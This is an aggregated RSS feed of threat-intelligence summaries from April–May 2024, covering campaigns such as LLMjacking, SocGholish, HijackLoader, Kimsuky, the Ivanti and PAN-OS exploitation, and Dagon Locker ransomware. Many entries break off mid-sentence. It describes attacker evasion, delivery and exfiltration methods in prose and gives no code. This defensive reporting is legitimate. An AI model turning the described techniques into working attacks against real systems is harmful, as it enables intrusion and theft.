This is the RSS 2.0 feed from www.secnews.physaphae.fr. IT's a simple agragated flow of multiple articles soruces. Liste of sources, can be found on www.secnews.physaphae.fr. 2024-05-14T20:49:39+00:00 www.secnews.physaphae.fr RiskIQ - cyber risk firms (now microsoft) 2024-05-13T13:30:14+00:00 https://community.riskiq.com/article/fd207107 www.secnews.physaphae.fr/article.php?IdArticle=8498946 False Spam,Malware,Tool,Vulnerability,Threat,Cloud APT 42 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) #### Targeted Industries - Information Technology ## Snapshot The Sysdig Threat Research Team released a report on a new attack termed LLMjacking, where exploited cloud credentials are used to target large language model (LLM) services. ## Description The credentials used in this attack were acquired from a system running a vulnerable version of Laravel ([CVE-2021-3129](https://security.microsoft.com/intel-explorer/cves/CVE-2021-3129/)). While attacks against LLM-based AI systems are often discussed in the context of prompt abuse and altering training data, this attack aimed to sell LLM access to other cybercriminals while the cloud account owner footed the bill. Upon initial access, attackers exfiltrated cloud credentials and penetrated the cloud environment to target local LLM models hosted by cloud providers. Sysdig researchers discovered evidence of a reverse proxy for LLMs being used, suggesting financial motivation or the extraction of LLM training data. Th]]> 2024-05-10T21:39:05+00:00 https://community.riskiq.com/article/344e58e5 www.secnews.physaphae.fr/article.php?IdArticle=8497469 False Threat,Cloud None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) ## Snapshot The North Korean hacking group Kimsuky has been observed using sophisticated methods to conduct espionage activities, including the exploitation of social media platforms and system management tools.  **Microsoft tracks Kimsuky as Emerald Sleet. [Read more about Emerald Sleet here.](https://security.microsoft.com/intel-profiles/f1e214422dcaf4fb337dc703ee4ed596d8ae16f942f442b895752ad9f41dd58e)** ## Description The group has been using fake Facebook profiles to target individuals involved in North Korean human rights and security affairs, engaging with potential targets through friend requests and personal messages. This social engineering tactic is designed to build trust and lure the targets into a trap, eventually leading to the sharing of malicious links or documents. Additionally, Kimsuky has adopted Microsoft Management Console (MMC) files, disguised as innocuous documents, to execute malicious commands on victims\' systems. Once opened, these files can potentially allow the attackers to gain control over the system or exfiltrate sensitive information, ultimately establishing a command and control (C2) channel to manage the compromised systems remotely. The use of social media platforms like Facebook for initial contact and the deployment of system management tools for executing attacks represents a significant escalation in cyber threat tactics. These methods indicate a shift towards more stealthy and socially engineered attacks that can bypass conventional security measures. The recent activities of the Kimsuky group underscore the continuous evolution of cyber threat actors and the need for robust cyb]]> 2024-05-10T19:33:41+00:00 https://community.riskiq.com/article/6e7f4a30 www.secnews.physaphae.fr/article.php?IdArticle=8497417 False Tool,Threat None 4.0000000000000000 RiskIQ - cyber risk firms (now microsoft) ## Snapshot SocGholish (also known as FakeUpdates), a malware known for its stealth and the intricacy of its delivery mechanisms, is targeting enterprises with deceptive browser update prompts. ## Description As reported by eSentire, compromised legitimate websites serve as the infection vector, where malicious JavaScript code is injected to prompt users to download browser updates. The downloaded files contain SocGholish malware, initiating the infection process upon execution.  The script employs various techniques to avoid detection and evade analysis. First, it checks if the browser is being controlled by automation tools and terminates execution if detected. Subsequently, it scrutinizes if the browser window has undergone significant manipulation to determine if the environment is being monitored. Additionally, it inspects for specific WordPress cookies to halt further actions if the user is logged into a WordPress site. If none of these conditions apply, it establishes a mouse movement event listener, tr]]> 2024-05-10T16:50:08+00:00 https://community.riskiq.com/article/c5bf96a0 www.secnews.physaphae.fr/article.php?IdArticle=8497333 False Malware,Tool,Threat None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-05-09T16:44:05+00:00 https://community.riskiq.com/article/1db83f2c www.secnews.physaphae.fr/article.php?IdArticle=8496697 False Malware,Vulnerability,Threat,Cloud None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) ## Snapshot Researchers at Zscaler have published a report about the evolution of HijackLoader, a malware loader, and its new evasion tactics. ## Description HijackLoader, also known as IDAT Loader, emerged in 2023 as a malware loader equipped with versatile modules for injecting and executing code. HijackLoader has modular architecture, an attribute that sets it apart from typical loaders.  Zscaler researchers analyzed a new HijackLoader variant that features upgraded evasion techniques. These enhancements aim to aid in the malware\'s stealth, prolonging its ability to evade detection. The latest version of HijackLoader introduces modules to bypass Windows Defender Antivirus, circumvent User Account Control (UAC), evade inline API hooking commonly used by security tools, and utilize process hollowing. HijackLoader\'s delivery mechanism involves utilizing a PNG image, decrypted and parsed to load the subsequent stage of the attack. HijackLoader has been observed serving as a delivery mechinism for various malware families, including Amadey, [Lumma Stealer](https://sip.security.microsoft.com/intel-profiles/33933578825488511c30b0728dd3c4f8b5ca20e41c285a56f796eb39f57531ad), Racoon Stealer v2, and Remcos RAT. ## Detections Microsoft Defender Antivirus detects threat components as the following malware: - [Trojan:Win32/HijackLoader](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/HijackLoader.AHJ!MTB&threatId=-2147058662) ## References [HijackLoader Updates](https://www.zscaler.com/blogs/security-research/hijackloader-updates). Zscaler (accessed 2024-05-09)]]> 2024-05-09T16:11:06+00:00 https://community.riskiq.com/article/8c997d7c www.secnews.physaphae.fr/article.php?IdArticle=8496698 False Malware,Tool,Threat None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-05-09T00:49:06+00:00 https://community.riskiq.com/article/1f1ae96f www.secnews.physaphae.fr/article.php?IdArticle=8496261 False Ransomware,Malware,Tool,Threat,Prediction,Cloud None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) ## Snapshot Juniper Threat Labs has reported that attackers are actively exploiting vulnerabilities in Ivanti Pulse Secure VPN appliances.  **Read more about Microsoft\'s coverage of [CVE-2023-46805 and CVE-2024-21887 here.](https://sip.security.microsoft.com/intel-profiles/cve-2023-46805)** ## Description The vulnerabilities, identified as CVE-2023-46805 and CVE-2024-21887, have been exploited to deliver the Mirai botnet, among other malware, posing a significant threat to network security worldwide. CVE-2023-46805 is a critical security flaw affecting Ivanti Connect Secure (ICS) and Ivanti Policy Secure gateways. This vulnerability allows remote attackers to bypass authentication mechanisms and gain unauthorized access to restricted resources. The second vulnerability, CVE-2024-21887, is a command injection flaw found in the web components of Ivanti Connect Secure and Ivanti Policy Secure. This vulnerability allows attackers to send specially crafted requests to execute arbitrary commands on the appliance. Attackers have used these vulnerabilities to deliver Mirai payloads through shell scripts.  Organizations using Ivanti Pulse Secure appliances are urged to apply the provided patches immediately and review their security posture to protect against these and future vulnerabilities. ## Recommendations As of January 31, 2024 Ivanti has released patches via the standard download portal for Ivanti Connect Secure (versions 9.1R14.4, 9.1R17.2, 9.1R18.3, 22.4R2.2 and 22.5R1.1) and ZTA version 22.6R1.3. Follow the [vendor\'s guide](https://forums.ivanti.com/s/article/How-to-The-Complete-Upgrade-Guide) to upgrade to a patched version. ## References "[Hackers Actively Exploiting Ivanti Pulse Secure Vulnerabilities](https://gbhackers.com/hackers-actively-exploiting/)" GBHackers. (Accessed 2024-05-08)]]> 2024-05-08T19:42:50+00:00 https://community.riskiq.com/article/2d95eb1b www.secnews.physaphae.fr/article.php?IdArticle=8496119 False Malware,Vulnerability,Threat None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) ## Snapshot JFrog Security Research has discovered three large-scale malware campaigns that targeted Docker Hub, planting millions of "imageless" repositories with malicious metadata. ## Description Docker Hub is a platform that delivers many functionalities to developers, presenting numerous opportunities for development, collaboration, and distribution of Docker images. Currently, it is the number one container platform of choice for developers worldwide. Yet, a significant concern arises when considering the content of these public repositories. The research reveals that nearly 20% of these public repositories actually hosted malicious content.  These repositories do not contain container images but instead contain metadata that is malicious. The content ranged from simple spam that promotes pirated content, to extremely malicious entities such as malware and phishing sites, uploaded by automatically generated accounts. Prior to this publication, the JFrog research team disclosed all findings to the Docker security team, including 3.2M repositories that were suspected as hosting malicious or unwanted content. The Docker security team quickly removed all of the malicious and unwanted repositories from Docker Hub ## Recommendations JFrog Security Research reccommends Users should prefer using Docker images that are marked in Docker Hub as “Trusted Content”. ## References ["JFrog Security Research Discovers Coordinated Attacks on Docker Hub that Planted Millions of Malicious Repositories"](https://jfrog.com/blog/attacks-on-docker-with-millions-of-malicious-repositories-spread-malware-and-phishing-scams/#new_tab) JFrog. (Accessed 2024-05-07)]]> 2024-05-07T20:14:06+00:00 https://community.riskiq.com/article/64465418 www.secnews.physaphae.fr/article.php?IdArticle=8495482 False Spam,Malware None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-05-06T19:54:46+00:00 https://community.riskiq.com/article/7c5aa156 www.secnews.physaphae.fr/article.php?IdArticle=8494794 False Malware,Vulnerability,Threat,Patching,Cloud APT 42 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-05-06T16:26:54+00:00 https://community.riskiq.com/article/157eab98 www.secnews.physaphae.fr/article.php?IdArticle=8494726 False Ransomware,Malware,Tool,Vulnerability,Threat None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) ## Snapshot Researchers at Zscaler have published a report about the evolution of ZLoader, a modular banking trojan, and its new evasion tactics. Check out Microsoft\'s write-up on ZLoader [here](https://sip.security.microsoft.com/intel-profiles/cbcac2a1de4e52fa5fc4263829d11ba6f2851d6822569a3d3ba9669e72aff789). ## Description ZLoader, also known as Terdot, DELoader, or Silent Night, is a modular Trojan derived from leaked ZeuS source code. After nearly two years of absence, ZLoader resurfaced in September 2023 with a new version incorporating changes to its obfuscation methods, domain generation algorithm (DGA), and network communication. Recently, it has reintroduced an anti-analysis mechanism reminiscent of the original ZeuS 2.x code. This feature limits ZLoader\'s binary execution to the infected system, a trait that had been abandoned by many malware strains derived from the leaked source code until this recent development. ## Detections Microsoft Defender Antivirus detects threat components as the following malware: - Trojan:Win64/ZLoader - Trojan:Win32/ZLoader ## References [ZLoader Learns Old Tricks](https://www.zscaler.com/blogs/security-research/zloader-learns-old-tricks#indicators-of-compromise--iocs-). Zscaler (accessed (2024-05-03) [ZLoader](https://sip.security.microsoft.com/intel-profiles/cbcac2a1de4e52fa5fc4263829d11ba6f2851d6822569a3d3ba9669e72aff789). Microsoft (accessed 2024-05-03) # ZLZLoaderoader]]> 2024-05-03T21:17:42+00:00 https://community.riskiq.com/article/0d7c21ec www.secnews.physaphae.fr/article.php?IdArticle=8493230 False Malware,Threat None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) ## Snapshot FortiGuard Labs has identified the emergence of the "Goldoon" botnet, which targets D-Link devices by exploiting the CVE-2015-2051 vulnerability. This allows attackers to gain complete control of vulnerable systems and launch further attacks, including distributed denial-of-service (DDoS). ## Description The botnet\'s initial infiltration involves the exploitation of CVE-2015-2051 to download a file "dropper" from a specific URL, which then downloads the botnet file using an XOR key to decrypt specific strings. The "dropper" script is programmed to automatically download, execute, and clean up potentially malicious files across various Linux system architectures. After execution, the script removes the executed file and then deletes itself to erase any trace of its activity. Once executed, Goldoon establishes a persistent connection with its Command and Control (C2) server and waits for commands to launch related behaviors, including various denial-of-service attacks. The malware contains 27 different methods related to various attacks, posing a significant threat to affected organizations. These methods include ICMP Flooding, TCP Flooding, UDP Flooding, DNS Flooding, HTTP Bypass, HTTP Flooding, and Minecraft DDoS Attack. ## References "[New Goldoon Botnet Targeting D-Link Devices](https://www.fortinet.com/blog/threat-research/new-goldoon-botnet-targeting-d-link-devices)" FortiGuard Labs. (Accessed 2024-05-03)]]> 2024-05-03T20:21:03+00:00 https://community.riskiq.com/article/de08653e www.secnews.physaphae.fr/article.php?IdArticle=8493201 False Malware,Vulnerability,Threat None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) ## Snapshot Cybersecurity professionals at GBHackers have discovered a series of cyberattacks targeting poorly managed Microsoft SQL (MS-SQL) servers to install Mallox Ransomware on systems. **Read more about Microsoft\'s coverage for [Mallox Ransomware here.](https://sip.security.microsoft.com/intel-profiles/7fbe39c998c8a495a1652ac6f8bd34852c00f97dc61278cafc56dca1d443131e)** ## Description The threat actor group\'s modus operandi involves exploiting vulnerabilities in improperly managed MS-SQL servers. By employing brute force and dictionary attacks, the attackers gain unauthorized access, primarily targeting the SA (System Administrator) account.  Once inside, they deploy the Remcos Remote Access Tool (RAT) to take control of the infected system. Remcos RAT, initially used for system breach and control, has been repurposed by attackers for malicious activities, featuring capabilities such as keylogging, screenshot capture, and control over webcams and microphones.  Additionally, a custom-made remote screen control malware is deployed, allowing attackers to gain access to the infected system using the AnyDesk ID obtained from the command and control server. Mallox ransomware, known for targeting MS-SQL servers, was then installed to encrypt the system.  Mallox ransomware, utilizes AES-256 and SHA-256 encryption algorithms, appending a ".rmallox" extension to encrypted files. The attack patterns observed in this campaign bear a striking resemblance to ]]> 2024-05-03T20:14:15+00:00 https://community.riskiq.com/article/f5f3ecc6 www.secnews.physaphae.fr/article.php?IdArticle=8493202 False Ransomware,Malware,Tool,Vulnerability,Threat,Technical None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) ## Snapshot Infoblox published an analysis of a threat actor group dubbed Muddling Meerkat, suspected to be a nation-state actor affiliated with China, conducting sophisticated and long-running operations through the Domain Name System (DNS). ## Description Muddling Meerkat\'s approach centers around hijacking internet traffic through sophisticated DNS manipulation techniques, primarily by generating an extensive volume of DNS queries distributed widely via open DNS resolvers. This tactic allows them to exert control over internet traffic, directing it according to their objectives. Unlike conventional denial-of-service attacks aimed at causing service disruptions, Muddling Meerkat\'s primary goal appears to be the manipulation and redirection of internet traffic, highlighting a strategic rather than disruptive motive. Their activities, which began at least as early as October 2019, demonstrate a sustained and methodical approach by the group. The level of expertise displayed in DNS manipulation indicates a profound understanding of network infrastructure and DNS protocols, reflecting a sophisticated and well-re]]> 2024-05-02T19:30:20+00:00 https://community.riskiq.com/article/b6049233 www.secnews.physaphae.fr/article.php?IdArticle=8492593 False Threat None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-05-01T20:56:45+00:00 https://community.riskiq.com/article/e27d7355 www.secnews.physaphae.fr/article.php?IdArticle=8492041 False Ransomware,Malware,Tool,Threat None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-05-01T19:46:49+00:00 https://community.riskiq.com/article/ddb0878a www.secnews.physaphae.fr/article.php?IdArticle=8492016 False Tool,Vulnerability,Threat,Studies,Mobile,Technical None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-05-01T19:01:06+00:00 https://community.riskiq.com/article/9a596ba8 www.secnews.physaphae.fr/article.php?IdArticle=8492017 False Malware,Tool,Threat,Medical,Commercial None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) #### Targeted Industries - Information Technology ## Snapshot The Securonix Threat Research Team has been monitoring a new ongoing social engineeri]]> 2024-05-01T01:13:37+00:00 https://community.riskiq.com/article/7ef7309c www.secnews.physaphae.fr/article.php?IdArticle=8491579 False Threat None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) ## Snapshot The DFIR report provides a detailed account of a sophisticated intrusion that began with a phishing campaign using PrometheusTDS to distribute IcedID malware in August 2023. ## Description The IcedID malware established persistence, communicated with C2 servers, and dropped a Cobalt Strike beacon, which was used for lateral movement, data exfiltration, and ransomware deployment. The threat actor also utilized a suite of tools such as Rclone, Netscan, Nbtscan, AnyDesk, Seatbelt, Sharefinder, and AdFind. The intrusion culminated in the deployment of Dagon Locker ransomware after 29 days. The threat actors employed various techniques to obfuscate the JavaScript file and the Cobalt Strike shellcode, evade detection, maintain persistence, and perform network enumeration activities. The threat actor\'s activities included the abuse of lateral movement functionalities such as PsExec and Remote Desktop Protocol (RDP), exfiltration of files, dumping and exfiltration of Windows Security event logs, and the use of PowerShell commands executed from the Cobalt Strike beacon. Additionally, the threat actor employed multiple exfiltration techniques, including the use of Rclone and AWS CLI to exfiltrate data from the compromised infrastructure. The deployment of the Dagon Locker ransomware was facilitated through the use of a custom PowerShell script, AWScollector, and a locker module, with a specific PowerShell command run from a domain controller to deploy the ransomware to different systems. The impact of this incident resulted in all systems being affected by the Dagon Locker ransomware. ## References [https://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/](https://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/)]]> 2024-04-29T20:07:15+00:00 https://community.riskiq.com/article/55e96eb8 www.secnews.physaphae.fr/article.php?IdArticle=8490876 False Ransomware,Malware,Tool,Threat,Technical None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-04-29T16:05:58+00:00 https://community.riskiq.com/article/aa388c3b www.secnews.physaphae.fr/article.php?IdArticle=8490778 False Ransomware,Malware,Tool,Vulnerability,Threat,Mobile,Industrial None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-04-26T19:12:08+00:00 https://community.riskiq.com/article/2641df15 www.secnews.physaphae.fr/article.php?IdArticle=8489234 False Ransomware,Spam,Malware,Tool,Threat,Industrial,Cloud None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) #### Targeted Geolocations - Central Asia - East Asia - North America - Northern Europe - South America - South Asia - Southeast Asia - Southern Europe - Western Europe - Eastern Europe - Central America and the Caribbean ## Snapshot Researchers at Securonix have discovered an ongoing attack campaign using phishing emails to deliver a malware called SSLoad.  The campaign, named FROZEN#SHADOW, also involves the deployment of Cobalt Strike and the ConnectWise ScreenConnect remote desktop software. ## Description According to Securonix, FROZEN#SHADOW victim organizations appear to be targeted randomly, but are concentrated in Europe, Asia, and the Americas. The attack methodology involves the distribution of phishing emails that contain links leading to the retrieval of a JavaScript file that initiates the infection process. Subsequently, the MSI installer connects to an attacker-controlled domain to fetch and execute the SSLoad malware payload, followed by beaconing to a command-and-control (C2) server along with system information. The initial reconnaissance phase sets the stage for the deployment of Cobalt Strike, a legitimate adversary simulation software, which is then leveraged to download and install ScreenConnect. This enables the threat actors to remotely commandeer the compromised host and achieve extensive persistence in the target environment. ## References [https://www.securonix.com/blog/securonix-threat-research-security-advisory-frozenshadow-attack-campaign/](https://www.securonix.com/blog/securonix-threat-research-security-advisory-frozenshadow-attack-campaign/) [https://thehackernews.com/2024/04/researchers-detail-multistage-attack.html](https://thehackernews.com/2024/04/researchers-detail-multistage-attack.html)]]> 2024-04-26T17:25:03+00:00 https://community.riskiq.com/article/e39d9bb3 www.secnews.physaphae.fr/article.php?IdArticle=8489190 False Malware,Threat None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-04-26T17:23:14+00:00 https://community.riskiq.com/article/ff848e92 www.secnews.physaphae.fr/article.php?IdArticle=8489191 False Ransomware,Malware,Tool,Threat None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) ## Snapshot ThreatFabric analysts have discovered a new mobile malware family called "Brokewell" that poses a significant threat to the banking industry. The malware is equipped with both data-stealing and remote-control capabilities, allowing attackers to gain remote access to all assets available through mobile banking. ## Description Brokewell uses overlay attacks to capture user credentials and can steal cookies by launching its own WebView. The malware also supports a variety of "spyware" functionalities, including collecting information about the device, call history, geolocation, and recording audio. After stealing the credentials, the actors can initiate a Device Takeover attack using remote control capabilities, giving them full control over the infected device. The malware is in active development, with new commands added almost daily.  ThreatFabric analysts discovered a fake browser update page designed to install an Android application that was used to distribute the malware. The malware is believed to be promoted on underground channels as a rental service, attracting the interest of other cybercriminals and sparking new campaigns targeting different regions. ## References [https://www.threatfabric.com/blogs/brokewell-do-not-go-broke-by-new-banking-malware](https://www.threatfabric.com/blogs/brokewell-do-not-go-broke-by-new-banking-malware) [https://www.bleepingcomputer.com/news/security/new-brokewell-malware-takes-over-android-devices-steals-data/](https://www.bleepingcomputer.com/news/security/new-brokewell-malware-takes-over-android-devices-steals-data/)]]> 2024-04-25T18:53:33+00:00 https://community.riskiq.com/article/99a5deee www.secnews.physaphae.fr/article.php?IdArticle=8488684 False Malware,Threat,Mobile None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) ## Snapshot Between November 2023 and March 2024, Zscaler ThreatLabz observed a threat actor utilizing fake domains spoofing legitimate IP scanner software sites to distribute a new backdoor called "MadMxShell." The actor registered look-alike domains and employed Google Ads to push them to the top of search results, targeting specific keywords. ## Description MadMxShell employs a complex array of techniques to evade detection and establish communication with its command-and-control (C2) server. Beginning with a multi-stage injection process, the backdoor utilizes DLL sideloading and compression to obfuscate its presence. Upon execution, it initiates DNS tunneling for C2 communication, utilizing DNS MX queries and responses to transmit commands and receive instructions from the C2 server. The backdoor\'s payload is encoded within DNS packets, with each byte converted into alphanumeric characters using a custom encoding scheme. This encoding process allows for data transfer between the infected machine and the C2 server, with each DNS packet limited to a maximum size to avoid detection. Additionally, MadMxShell employs memory forensics evasion techniques, including anti-dumping measures, to hinder analysis and detection by security solutions. Zscaler ThreatLabz is unable to attribute this activity to any known threat actor at this time; however, it assesses that the TTPs are indicative of a sophisticated actor who may be interested in targeting IT professionals, specifically those in IT security and network administration roles. ## References [https://www.zscaler.com/blogs/security-research/malvertising-campaign-targeting-it-teams-madmxshell](https://www.zscaler.com/blogs/security-research/malvertising-campaign-targeting-it-teams-madmxshell)]]> 2024-04-24T21:21:49+00:00 https://community.riskiq.com/article/ffa6ca10 www.secnews.physaphae.fr/article.php?IdArticle=8488231 False Threat None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) ## Snapshot Cisco Talos reports on the ArcaneDoor campaign, attributed to the state-sponsored actor UAT4356 (Tracked by Microsoft as Storm-1849), targets perimeter network devices from multiple vendors, particularly Cisco Adaptive Security Appliances (ASA).  Microsoft tracks this actor as Storm-1849, [read more about them here.](https://sip.security.microsoft.com/intel-profiles/f3676211c9f06910f7f1f233d81347c1b837bddd93292c2e8f2eb860a27ad8d5) #]]> 2024-04-24T19:34:05+00:00 https://community.riskiq.com/article/a0cf0328 www.secnews.physaphae.fr/article.php?IdArticle=8488184 False Malware,Tool,Vulnerability,Threat None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) #### Targeted Geolocations - Ukraine - Estonia - Eastern Europe ## Snapshot WithSecure has published research about a backdoor called "Kapeka," tracked by Microsoft as "KnuckleTouch," used in attacks in Eastern Europe since mid-2022. Kapeka functions as a versatile backdoor, providing both initial toolkit capabilities and long-term access to victims. Its sophistication suggests involvement by an APT group. WithSecure links Kapeka to Sandworm, tracked by Microsoft as Seashell Blizzard, a notorious Russian nation-state threat group associated with the GRU known for destructive attacks in Ukraine. **Microsoft tracks Sandworm as Seashell Blizzard.** [Read more about Seashell Blizzard here.](https://sip.security.microsoft.com/intel-profiles/cf1e406a16835d56cf614430aea3962d7ed99f01ee3d9ee3048078288e5201bb) **Microsoft tracks Kapeka as KnuckleTouch. **[Read more about Knuckletouch here.](https://sip.security.microsoft.com/intel-profiles/cdbe72d9f5f1ee3b3f8cd4e78a4a07f76addafdcc656aa2234a8051e8415d282) ## Description Kapeka overlaps with GreyEnergy and Prestige ransomware attacks, all attributed to Sandworm. WithSecure assesses it\'s likely that Kapeka is a recent addition to Sandworm\'s arsenal. The malware\'s dropper installs the backdoor, collecting machine and user information for the threat actor. However, the method of Kapeka\'s distribution remains unknown. Kapeka\'s emergence coincides with the Russia-Ukraine conflict, suggesting targeted attacks across Central and Eastern Europe since 2022. It may have been involved in the deployment of Prestige ransomware in late 2022. Kapeka is speculated to succeed GreyEnergy in Sandworm\'s toolkit, possibly replacing BlackEnergy. ## References [https://labs.withsecure.com/publications/kapeka](https://labs.withsecure.com/publications/kapeka)]]> 2024-04-23T16:31:06+00:00 https://community.riskiq.com/article/364efa92 www.secnews.physaphae.fr/article.php?IdArticle=8487526 False Ransomware,Malware,Threat None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) ## Snapshot Botnets such as Moobot, Miori, AGoent, and Gafgyt Variant are exploiting the CVE-2023-1389 vulnerability, which was disclosed last year. The vulnerability is an unauthenticated command injection vulnerability in the “locale” API available via the web management interface of the TP-Link Archer AX21 (AX1800). ## Description Multiple botnets, including Moobot, Miroi, AGoent, and the Gafgyt Variant, have been observed exploiting this vulnerability. Each botnet employs unique methods of infection and attack, with AGoent and the Gafgyt Variant targeting Linux-based architectures to launch DDoS attacks, while Moobot initiates DDoS attacks on remote IPs after retrieving ELF files from a specific URL. The initial infiltration occurs through the unauthenticated command injection vulnerability in the "locale" API, allowing attackers to achieve command injection by manipulating the "country" form and "write" operation. ## References [https://www.fortinet.com/blog/threat-research/botnets-continue-exploiting-cve-2023-1389-for-wide-scale-spread](https://www.fortinet.com/blog/threat-research/botnets-continue-exploiting-cve-2023-1389-for-wide-scale-spread)]]> 2024-04-22T19:02:33+00:00 https://community.riskiq.com/article/244cbe20 www.secnews.physaphae.fr/article.php?IdArticle=8487003 False Vulnerability None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-04-22T15:04:06+00:00 https://community.riskiq.com/article/03b84c13 www.secnews.physaphae.fr/article.php?IdArticle=8486904 False Vulnerability,Threat None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) #### Targeted Geolocations - United States ## Snapshot In late 2023, BlackBerry analysts detected a spear-phishing campaign launched by FIN7, tracked by Microsoft as Sangria Tempest, targeting a US-based automotive manufacturer. ## Description The attackers concentrated on employees within the IT department possessing elevated administrative privileges, luring them with an offer of a free IP scanning tool, which concealed the Anunak backdoor. This incident is demonstrative of a shift in FIN7\'s efforts from widespread targeting to more precise targeting of high-value sectors such as transportation and defense. Upon clicking on embedded URLs, victims were directed to malicious websites, part of a typosquatting scheme, which facilitated the download and execution of the Anunak backdoor onto their systems. The deployment of living off the land binaries, scripts, and libraries (lolbas) masked the malicious activity, aiding in the attackers\' initial foothold. Furthermore, the malware execution flow involved intricate multi-stage processes, including the decryption and execution of payloads, such as Anunak, and the establishment of persistence through OpenSSH. During the delivery phase of this campaign, the fake lure website, “advanced-ip-sccanner\[.\]com,” redirected to “myipscanner\[.\]com.” Blackberry analysts found multiple domains registered within minutes of the original on the same provider, illustrating that this campaign is likely not limited to this attack, but is instead part of a wider campaign by FIN7. ## References [https://blogs.blackberry.com/en/2024/04/fin7-targets-the-united-states-automotive-industry](https://blogs.blackberry.com/en/2024/04/fin7-targets-the-united-states-automotive-industry)]]> 2024-04-18T20:37:30+00:00 https://community.riskiq.com/article/e14e343c www.secnews.physaphae.fr/article.php?IdArticle=8484949 False Malware,Tool,Threat None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) #### Targeted Geolocations - United States - Korea #### Targeted Industries - Non-Government Organization - Think Tank - Multi-discipline ## Snapshot Proofpoint published an article detailing the information gathering tactics that TA427, tracked by Microsoft as Emerald Sleet, conducts. ## Description TA427, a threat actor aligned with North Korea, is known for using sophisticated social engineering tactics and web beacons for reconnaissance. TA427 engages in benign conversation starter campaigns to gather strategic intelligence related to US and South Korea foreign policy initiatives. The threat actor heavily relies on social engineering tactics, including Domain-based Message Authentication, Reporting and Conformance (DMARC) abuse, typosquatting, and private email account spoofing, to impersonate individuals from various verticals such as think tanks, NGOs, and government. Additionally, TA427 uses web beacons for initial reconnaissance to validate active email accounts and gather fundamental information about the recipients\' network environments.  TA427 is a persistent and adaptable threat actor as they are quickly able to stand up new infrastructure and personas. Furthermore, TA427 is identified as one of the most active state-aligned threat actors currently tracked by Proofpoint. The threat actor uses web beacons, tracking beaco]]> 2024-04-17T21:47:14+00:00 https://community.riskiq.com/article/5d36b082 www.secnews.physaphae.fr/article.php?IdArticle=8484384 False Threat None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) #### Targeted Geolocations - Ukraine ## Snapshot Sponsored by Russian military intelligence, APT44 is a dynamic and operationally mature threat actor that is actively engaged in the full spectrum of espionage, attack, and influence operations. **Microsoft tracks this APT as Seashell Blizzard.  [Read more about them here.](https://sip.security.microsoft.com/intel-profiles/cf1e406a16835d56cf614430aea3962d7ed99f01ee3d9ee3048078288e5201bb)** ## Description APT44 is a dynamic and operationally mature threat actor that is actively engaged in the full spectrum of espionage, attack, and influence operations. The group has honed each of these capabilities and sought to integrate them into a unified playbook over time. APT44 has aggressively pursued a multi-pronged effort to help the Russian military gain a wartime advantage and is responsible for nearly all of the disruptive and destructive operations against Ukraine over the past decade. The group presents a persistent, high severity threat to governments and critical infrastructure operators globally where Russian national interests intersect. APT44 is seen by the Kremlin as a flexible instrument of power capable of servicing Russia\'s wide-ranging national interests and ambitions, including efforts to undermine democratic processes globally. The group\'s support of the Kremlin\'s political objectives has resulted in some of the largest and mo]]> 2024-04-17T20:31:47+00:00 https://community.riskiq.com/article/24c2a760 www.secnews.physaphae.fr/article.php?IdArticle=8484361 False Threat,Cloud None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) ## Snapshot On April 10, 2024, Volexity discovered zero-day exploitation of a vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS at one of its network security monitoring (NSM) customers. The vulnerability was confirmed as an OS command injection issue and assigned CVE-2024-3400. The issue is an unauthenticated remote code execution vulnerability with a CVSS base score of 10.0. The threat actor, which Volexity tracks under the alias UTA0218, was able to remotely exploit the firewall device, create a reverse shell, and download further tools onto the device. The attacker focused on exporting configuration data from the devices, and then leveraging it as an entry point to move laterally within the victim organizations. During its investigation, Volexity observed that UTA0218 attempted to install a custom Python backdoor, which Volexity calls UPSTYLE, on the firewall. The UPSTYLE backdoor allows the attacker to execute additional commands on the device via specially crafted network requests. UTA0218 was observed exploiting firewall devices to successfully deploy malicious payloads. After successfully exploiting devices, UTA0218 downloaded additional tooling from remote servers they controlled in order to facilitate access to victims\' internal networks. They quickly moved laterally thr]]> 2024-04-15T20:31:45+00:00 https://community.riskiq.com/article/958d183b www.secnews.physaphae.fr/article.php?IdArticle=8482982 False Tool,Vulnerability,Threat None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-04-15T15:15:00+00:00 https://community.riskiq.com/article/c2035b32 www.secnews.physaphae.fr/article.php?IdArticle=8482834 False Ransomware,Spam,Malware,Tool,Threat,Prediction None 2.0000000000000000 RiskIQ 